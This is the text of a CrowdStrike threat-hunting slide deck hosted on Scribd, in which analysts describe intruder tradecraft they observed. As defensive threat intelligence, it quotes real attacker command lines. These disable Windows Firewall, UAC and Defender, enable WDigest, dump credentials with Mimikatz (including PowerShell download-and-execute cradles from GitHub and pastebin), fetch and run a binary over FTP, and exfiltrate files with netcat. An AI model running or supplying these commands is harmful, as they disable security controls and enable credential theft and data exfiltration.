Scribd
Upload
30 views19 pages

From The Trenches: Observations of and Tracking Actor Activity

The document discusses observations from tracking actor activity and analyzing their tactics and techniques. It covers topics like collection bias, event enrichment using MITRE ATT&CK, examples of infrastructure modifications and credential access methods observed, and actor reactions to detection.

Uploaded by

neoalt
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
30 views19 pages

From The Trenches: Observations of and Tracking Actor Activity

The document discusses observations from tracking actor activity and analyzing their tactics and techniques. It covers topics like collection bias, event enrichment using MITRE ATT&CK, examples of infrastructure modifications and credential access methods observed, and actor reactions to detection.

Uploaded by

neoalt
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
You are on page 1/ 19

FROM THE TRENCHES:

OBSERVATIONS OF AND
TRACKING ACTOR ACTIVITY
H. CARVEY, SR RESEARCHER, OWSR-OUTREACH

2015 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.


INTRO
 whoami
 What do we do?
 Questions – Feel Free to Ask

2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.


Collection Bias

Event Enrichment

MITRE ATT&CK

Things we see

Nuggets

2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.


COLLECTION BIAS
• OverWatch threat hunting against Falcon sensor telemetry
• Notification emails
• Customer responses
• Hands on keyboard activity
• NATION-STATE
• ECRIME
• TESTING

2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.


EVENT ENRICHMENT
• Vertical
• Geo-region
• Operating system(s) affected
• Attribution confidence
• MITRE ATT&CK

2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.


MITRE ATT&CK

https://www.crowdstrike.com/resources/
reports/2019-crowdstrike-global-threat-
report/

2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.


THINGS WE SEE

• Actors modifying infrastructure


• Actor reactions
• Situational awareness

2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.


ACTOR MODIFYING INFRASTRUCTURE
Disable Windows Firewall
netsh advfirewall set allprofiles state off

Disable User Account Control


reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
/v EnableLUA /t REG_DWORD /d 0 /f0

Modify system binaries – compile new functions into ssh/sshd to record credentials,
permit access via “magic key”

2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.


ACTOR MODIFYING INFRASTRUCTURE
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\Wdigest /v
UseLogonCredential REG_DWORD /d 1

Disable remote UAC restrictions


HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System
Value: LocalAccountTokenFilterPolicy, set to “1”

Disable machine account password changes on a workstation


HKLM\System\CurrentControlSet\Services\Netlogon\Parameters
Value: DisablePasswordChange, set to “1”

2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.


ACTOR REACTIONS
What happens when the Falcon sensor blocks an actor’s attempts?

We see the full range:


• Give up
• Troubleshoot
• Move to another system(s) and try again
• Disable security tools/AV

2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.


ACTOR REACTIONS
msiexec /x {GUID} /quiet /norestart
sc stop WinDefend
sc config “MsMpSvc” start=disabled
net stop MsMpSvc /y
taskkill /f /t /im MsMpEng.exe
powershell -w 1 -c (Get-WmiObject -Class Win32_Product -Filter "Name
LIKE '%Defender%'").Uninstall()

2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.


SITUATIONAL AWARENESS
Limited situational awareness of EDR solutions
“tasklist /svc | find “Cb”
“cmd.exe /c "powershell Get-Service CylanceSVC | select Status,CanStop”

What we’re NOT seeing, to a large extent:


• Prior knowledge of monitoring
• Knowledge or recon of monitoring prior to moving laterally

2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.


NUGGETS – CREDENTIAL ACCESS
c:\ProgramData\p.exe  ""privilege::debug"" ""sekurlsa::logonpasswords""

powershell  -ep Bypass -NoP -NonI -NoLogo -c IEX (New-Object


Net.WebClient).DownloadString('https://raw.githubusercontent[.]com/
[REDACTED]/Invoke-Mimikatz.ps1');Invoke-Mimikatz -Command
'privilege::debug sekurlsa::logonpasswords exit’

powershell IEX (New-Object


Net.WebClient).DownloadString('https://pastebin.com/[REDACTED])Invoke-
Mimikatz -Command '"log" "token::elevate" "lsadump::sam"'

2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.


NUGGETS – CREDENTIAL ACCESS
Wmic  /NODE:"[REDACTED]" /USER:"[REDACTED]" /password:
[REDACTED] process call create "cmd.exe /c (c:\windows\security\mnl.exe
pr::dg sl::lp et -p >c:\windows\security\file.txt) >> c:\windows\temp\temp.txt”

m.exe powerful -d sekurlsa logonpasswords > c:\windows\temp\file.txt

c:\windows\temp\MicrosoftUpdate.exe p::d s::l q > c:\windows\temp\mic.txt

2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.


NUGGETS
Windows
Use of SolarWinds Remote Management Tool, winagentrcl.exe
Use of AppInit_DLLs for persistence
Use of “msiexec /x” to uninstall products (AV) – Defense Evasion
Use of ‘chcp’ (1251, 850) to change cmd.exe code page
Linux
Enumerating Ruby after_cd hooks - Persistence

2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.


NUGGETS - EXFILTRATION
Windows Command Line
cmd.exe /c "@echo open AA.BB.CC[.]DD>>ftpget.txt&@echo
<name>>>ftpget.txt&@echo hehehe>>ftpget.txt&@echo
binary>>ftpget.txt&@echo get f.exe>>ftpget.txt&@echo
quit>>ftpget.txt&@ftp -s:ftpget.txt&@start f.exe”

Linux
Use of netcat (data exfil); i.e., “nc –nv < some_file.zip”

2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.


NUGGETS
Time-to-Use
11 Feb – Jenkins vulnerability disclosed
12 Feb – observed actor attempting to download Metasploit module targeting
Jenkins (just over 24 hrs)

2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.


QUESTIONS?

2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.


WE STOP
BREACHES
2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.

You might also like